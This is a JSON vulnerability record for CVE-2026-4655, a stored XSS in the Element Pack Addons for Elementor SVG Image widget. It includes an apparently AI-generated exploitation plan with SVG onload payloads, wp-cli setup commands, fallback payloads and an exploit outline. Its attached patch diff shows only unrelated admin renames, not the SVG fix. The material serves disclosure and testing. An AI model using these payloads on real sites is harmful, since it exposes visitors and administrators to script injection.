[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f6YY2IcR8j5FPcd5nhSrCa9uS2eTxQIKoY2ApiukCl_o":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":9,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":40},"CVE-2026-4655","element-pack-addons-for-elementor-authenticated-contributor-stored-cross-site-scripting-via-svg-image-widget","Element Pack Addons for Elementor \u003C= 8.4.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via SVG Image Widget","The Element Pack Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the SVG Image Widget in versions up to and including 8.4.2. This is due to insufficient input sanitization and output escaping on SVG content fetched from remote URLs in the render_svg() function. The function fetches SVG content using wp_safe_remote_get() and then directly echoes it to the page without any sanitization, only applying a preg_replace() to add attributes to the SVG tag which does not remove malicious event handlers. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary JavaScript in SVG files that will execute whenever a user accesses a page containing the malicious widget.","bdthemes-element-pack-lite",null,"\u003C=8.4.2","8.5.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-07 19:36:01","2026-04-08 07:43:02",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F0838f085-8ff7-4c6a-bd5b-af99f666377b?source=api-prod",1,[22,23,24,25,26,27,28,29],"admin\u002Fadmin-api-biggopti.php","admin\u002Fadmin-feeds.php","admin\u002Fadmin.php","admin\u002Fassets\u002Fcss\u002Fep-admin-api-biggopti.css","admin\u002Fassets\u002Fcss\u002Fep-admin-api-biggopti.rtl.css","admin\u002Fassets\u002Fcss\u002Fep-admin.css","admin\u002Fassets\u002Fcss\u002Fep-admin.rtl.css","admin\u002Fassets\u002Fcss\u002Fep-biggopti.css","researched",false,3,"This research plan outlines the steps required to demonstrate the Stored Cross-Site Scripting (XSS) vulnerability in the Element Pack Addons for Elementor plugin.\n\n### 1. Vulnerability Summary\nThe **Element Pack Addons for Elementor** plugin (up to version 8.4.2) contains a Stored XSS vulnerability in its \"SVG Image Widget\". The widget allows users to provide a remote URL to an SVG file. The plugin fetches the SVG content via `wp_safe_remote_get()` and renders it directly onto the page. While it attempts to use `preg_replace()` to inject attributes into the `\u003Csvg>` tag, it fails to sanitize the SVG content for malicious event handlers (like `onload` or `onclick`) or `\u003Cscript>` tags embedded within the XML structure of the SVG.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** WordPress Frontend (via Elementor-rendered page).\n*   **Vulnerable Widget:** SVG Image Widget (Widget ID: `bdt-svg-image` - *inferred from plugin naming conventions*).\n*   **Vulnerable Function:** `render_svg()` (located in the widget class).\n*   **Payload Parameter:** The `svg_url` (or similarly named) setting within the Elementor widget configuration.\n*   **Authentication Level:** Contributor or higher. Contributors can create and edit posts\u002Fpages using Elementor.\n*   **Precondition:** The attacker must be able to host a malicious SVG file or use a data URI (if permitted by `wp_safe_remote_get()`, though an external URL is the primary vector).\n\n### 3. Code Flow\n1.  **Entry Point:** A user with Contributor+ permissions edits a post using Elementor and adds the \"SVG Image\" widget.\n2.  **Configuration:** The user provides a URL to a malicious SVG in the widget settings (saved to `_elementor_data` post meta).\n3.  **Frontend Rendering:** When a victim views the post:\n    *   Elementor triggers the `render()` method of the `bdt-svg-image` widget.\n    *   The `render()` method calls `render_svg()`.\n    *   `render_svg()` retrieves the URL from settings and executes `wp_safe_remote_get($url)`.\n    *   The raw body of the response (the SVG XML) is stored in a variable.\n    *   A `preg_replace()` is applied to the `\u003Csvg` tag to add classes or IDs, but no sanitization (like `wp_kses()` or a dedicated SVG sanitizer) is performed on the rest of the XML.\n    *   **Sink:** The unsanitized SVG content is `echo`-ed directly into the HTML response.\n\n### 4. Nonce Acquisition Strategy\nWhile Elementor uses nonces for saving content (`elementor_ajax` action), this is a **Stored XSS** vulnerability. The most efficient PoC methodology in an automated environment is to bypass the complex Elementor UI\u002FAPI and inject the malicious payload directly into the database using `wp-cli`, then verify the output via a simple GET request.\n\nIf the agent must perform the exploitation via the HTTP API:\n1.  Navigate to the Elementor Editor for a specific post.\n2.  The `elementor_ajax` nonce is usually localized in the `elementorCommonConfig` object.\n3.  **JS Variable:** `window.elementorCommonConfig?.ajax?.nonce` or `window.elementor?.config?.ajax?.nonce`.\n\n### 5. Exploitation Strategy\n1.  **Host Malicious SVG:** Create a file named `xss.svg` with the following content:\n    ```xml\n    \u003Csvg xmlns=\"http:\u002F\u002Fwww.w3.org\u002F2000\u002Fsvg\" onload=\"alert('CVE-2026-4655_XSS')\">\u003C\u002Fsvg>\n    ```\n2.  **Setup Target Post:** Create a post and set the `_elementor_data` meta to include the vulnerable widget pointing to the hosted SVG.\n3.  **Trigger:** Access the post URL as an unauthenticated visitor or admin.\n\n### 6. Test Data Setup\nThe PoC agent should execute the following commands:\n```bash\n# 1. Create a Contributor user\nwp user create attacker attacker@example.com --role=contributor --user_pass=password123\n\n# 2. Create a post to hold the XSS\nPOST_ID=$(wp post create --post_type=page --post_title=\"SVG XSS Test\" --post_status=publish --user=attacker --porcelain)\n\n# 3. Define the Elementor JSON structure for the SVG Image widget\n# Note: \"bdt-svg-image\" is the likely widget ID for Element Pack's SVG Image.\n# The URL should point to a location reachable by the WordPress server.\n# Using a local path if the plugin allows it, or a mock URL.\nMALICIOUS_SVG_URL=\"http:\u002F\u002Flocalhost\u002Fxss.svg\"\n\nELEMENTOR_DATA='[{\"id\":\"exploit-id\",\"elType\":\"widget\",\"settings\":{\"svg_url\":\"'$MALICIOUS_SVG_URL'\"},\"widgetType\":\"bdt-svg-image\"}]'\n\n# 4. Inject the payload into post meta\nwp post meta update $POST_ID _elementor_data \"$ELEMENTOR_DATA\"\nwp post meta update $POST_ID _elementor_edit_mode \"builder\"\n\n# 5. Create the malicious SVG file in the web root\necho '\u003Csvg xmlns=\"http:\u002F\u002Fwww.w3.org\u002F2000\u002Fsvg\" onload=\"console.log(\\\"XSS_TRIGGERED\\\"),alert(document.domain)\">\u003C\u002Fsvg>' > \u002Fvar\u002Fwww\u002Fhtml\u002Fxss.svg\n```\n\n### 7. Expected Results\n1.  When the `http_request` tool fetches the URL of the created post (`\u002F?p=$POST_ID`), the response body should contain:\n    ```html\n    \u003Csvg xmlns=\"http:\u002F\u002Fwww.w3.org\u002F2000\u002Fsvg\" onload=\"console.log(\"XSS_TRIGGERED\"),alert(document.domain)\">\u003C\u002Fsvg>\n    ```\n2.  The `onload` attribute will remain intact despite the `preg_replace` logic in `render_svg()`.\n3.  In a browser context, the alert box would trigger, and the console would log `XSS_TRIGGERED`.\n\n### 8. Verification Steps\nAfter the HTTP request, verify the sink via CLI:\n```bash\n# Check if the output is being rendered in the post content\ncurl -s \"http:\u002F\u002Flocalhost\u002F?p=$POST_ID\" | grep \"XSS_TRIGGERED\"\n```\n\n### 9. Alternative Approaches\n*   **Remote Fetching:** If `wp_safe_remote_get()` blocks `localhost`, use a service like `bin.org` or a dedicated mock server provided by the environment.\n*   **Attribute Breakout:** If the plugin somehow strips `onload`, try `\u003Csvg>\u003Cscript>alert(1)\u003C\u002Fscript>\u003C\u002Fsvg>` or using `onmouseover` \u002F `onfocus` event handlers.\n*   **Data URI:** Test if the `svg_url` setting accepts `data:image\u002Fsvg+xml;base64,...`. This would remove the need for external hosting.\n*   **Parameter Identification:** If `svg_url` is incorrect, search the plugin folder for the `render_svg` function to find the exact setting name:\n    `grep -r \"render_svg\" wp-content\u002Fplugins\u002Fbdthemes-element-pack-lite\u002F`\n    Then find the `$this->get_settings('SETTING_NAME')` call within that file.","The Element Pack Addons for Elementor plugin is vulnerable to Stored Cross-Site Scripting via the SVG Image Widget. Authenticated attackers with Contributor-level access or higher can inject arbitrary JavaScript by providing a remote URL to a malicious SVG file, which the plugin fetches and renders without proper sanitization.","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbdthemes-element-pack-lite\u002F8.4.2\u002Fadmin\u002Fadmin-api-biggopti.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbdthemes-element-pack-lite\u002F8.5.0\u002Fadmin\u002Fadmin-api-biggopti.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbdthemes-element-pack-lite\u002F8.4.2\u002Fadmin\u002Fadmin-api-biggopti.php\t2026-03-01 10:37:54.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbdthemes-element-pack-lite\u002F8.5.0\u002Fadmin\u002Fadmin-api-biggopti.php\t2026-03-30 05:19:30.000000000 +0000\n@@ -17,13 +17,13 @@\n \t}\n \n \tpublic function __construct() {\n-\t\tadd_action('wp_ajax_bdt_admin_api_biggopti_dismiss', [$this, 'bdt_admin_api_biggopti_dismiss']);\n+\t\tadd_action('wp_ajax_ep_admin_api_biggopti_dismiss', [$this, 'ep_admin_api_biggopti_dismiss']);\n \t}\n \n \t\u002F**\n \t * Dismiss Admin API Biggopti.\n \t *\u002F\n-\tpublic function bdt_admin_api_biggopti_dismiss() {\n+\tpublic function ep_admin_api_biggopti_dismiss() {\n \t\t$nonce = (isset($_POST['_wpnonce'])) ? sanitize_text_field($_POST['_wpnonce']) : '';\n \t\t$display_id = (isset($_POST['display_id'])) ? sanitize_text_field($_POST['display_id']) : '';\n \t\t$id   = (isset($_POST['id'])) ? esc_attr($_POST['id']) : '';\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbdthemes-element-pack-lite\u002F8.4.2\u002Fadmin\u002Fadmin-feeds.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbdthemes-element-pack-lite\u002F8.5.0\u002Fadmin\u002Fadmin-feeds.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbdthemes-element-pack-lite\u002F8.4.2\u002Fadmin\u002Fadmin-feeds.php\t2026-03-01 10:37:54.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbdthemes-element-pack-lite\u002F8.5.0\u002Fadmin\u002Fadmin-feeds.php\t2026-03-30 05:19:30.000000000 +0000\n@@ -68,7 +68,7 @@\n \t\t\t\t\t\u003Cp>\n \t\t\t\t\t\t\u003C?php echo wp_kses_post( wp_trim_words( wp_strip_all_tags( $feed->content ), 50 ) ); ?>\n \t\t\t\t\t\t\u003Ca href=\"\u003C?php echo esc_url( $feed->demo_link ); ?>\" target=\"_blank\">\n-\t\t\t\t\t\t\t\u003C?php esc_html_e( 'Learn more...', 'bdthemes-element-pack' ); ?>\n+\t\t\t\t\t\t\t\u003C?php esc_html_e( 'Learn more...', $this->settings['text_domain'] ); ?>\n \t\t\t\t\t\t\u003C\u002Fa>\n \t\t\t\t\t\u003C\u002Fp>\n \t\t\t\t\u003C\u002Fdiv>\n@@ -130,7 +130,7 @@\n \t\t\t$rss = fetch_feed( $this->settings['feed_link'] );\n \n \t\t\tif ( is_wp_error( $rss ) ) {\n-\t\t\t\treturn '\u003Cli>' . esc_html__( 'Items Not Found', 'bdthemes-element-pack' ) . '.\u003C\u002Fli>';\n+\t\t\t\treturn '\u003Cli>' . esc_html__( 'Items Not Found', $this->settings['text_domain'] ) . '.\u003C\u002Fli>';\n \t\t\t}\n \n \t\t\t$maxitems  = $rss->get_item_quantity( 5 );\n@@ -154,21 +154,24 @@\n \n \t\tob_start();\n \t\t?>\n-t\t\u003Cdiv class=\"rss-widget\">\n+\t\t\u003Cdiv class=\"bdt-widget\">\n \t\t\t\u003Cul>\n \t\t\t\t\u003C?php if ( empty( $rss_items ) ) : ?>\n-\t\t\t\t\t\u003Cli>\u003C?php esc_html_e( 'Items Not Found', 'bdthemes-element-pack' ); ?>.\u003C\u002Fli>\n+\t\t\t\t\t\u003Cli>\u003C?php esc_html_e( 'Items Not Found', $this->settings['text_domain'] ); ?>.\u003C\u002Fli>\n \t\t\t\t\u003C?php else : ?>\n \t\t\t\t\t\u003C?php foreach ( $rss_items as $item ) : ?>\n \t\t\t\t\t\t\u003Cli>\n \t\t\t\t\t\t\t\u003Ca target=\"_blank\" href=\"\u003C?php echo esc_url( $item['link'] ); ?>\"\n \t\t\t\t\t\t\t\ttitle=\"\u003C?php echo esc_html( $item['date'] ); ?>\">\n+\t\t\t\t\t\t\t\t\u003C?php if ( $this->is_feed_item_new( $item['date'] ) ) : ?>\n+\t\t\t\t\t\t\t\t\t\u003Cspan class=\"bdt-feed-badge bdt-feed-badge--new\">\u003C?php esc_html_e( 'New', $this->settings['text_domain'] ); ?>\u003C\u002Fspan>\n+\t\t\t\t\t\t\t\t\u003C?php endif; ?>\n \t\t\t\t\t\t\t\t\u003C?php echo esc_html( $item['title'] ); ?>\n \t\t\t\t\t\t\t\u003C\u002Fa>\n-\t\t\t\t\t\t\t\u003Cspan class=\"rss-date\" style=\"display: block; margin: 0;\">\n-\t\t\t\t\t\t\t\t\u003C?php echo esc_html( human_time_diff( $item['date'], current_time( 'timestamp' ) ) . ' ' . __( 'ago', 'bdthemes-element-pack' ) ); ?>\n+\t\t\t\t\t\t\t\u003Cspan class=\"bdt-date\" style=\"display: block; margin: 0;\">\n+\t\t\t\t\t\t\t\t\u003C?php echo esc_html( human_time_diff( $item['date'], current_time( 'timestamp' ) ) . ' ' . __( 'ago', $this->settings['text_domain'] ) ); ?>\n \t\t\t\t\t\t\t\u003C\u002Fspan>\n-\t\t\t\t\t\t\t\u003Cdiv class=\"rss-summary\">\n+\t\t\t\t\t\t\t\u003Cdiv class=\"bdt-summary\">\n \t\t\t\t\t\t\t\t\u003C?php echo esc_html( wp_html_excerpt( $item['content'], 120 ) . ' [...]' ); ?>\n \t\t\t\t\t\t\t\u003C\u002Fdiv>\n \t\t\t\t\t\t\u003C\u002Fli>","The exploit is achieved by performing the following steps: \n1. An attacker with Contributor-level permissions hosts a malicious SVG file on a remote server. The SVG contains a JavaScript payload (e.g., using an 'onload' attribute like \u003Csvg onload='alert(1)'>).\n2. The attacker creates or edits a post\u002Fpage using the Elementor editor and inserts the 'SVG Image' widget (bdt-svg-image).\n3. Within the widget settings, the attacker provides the URL of the hosted malicious SVG file.\n4. The plugin's rendering logic calls render_svg(), which uses wp_safe_remote_get() to fetch the SVG content and echoes it directly to the page without sanitization.\n5. When a victim (such as an administrator) views the page, the malicious script executes within their browser session.","gemini-3-flash-preview","2026-04-17 20:28:55","2026-04-17 20:29:21",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","8.4.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbdthemes-element-pack-lite\u002Ftags\u002F8.4.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbdthemes-element-pack-lite.8.4.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbdthemes-element-pack-lite\u002Ftags\u002F8.5.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbdthemes-element-pack-lite.8.5.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbdthemes-element-pack-lite\u002Ftags"]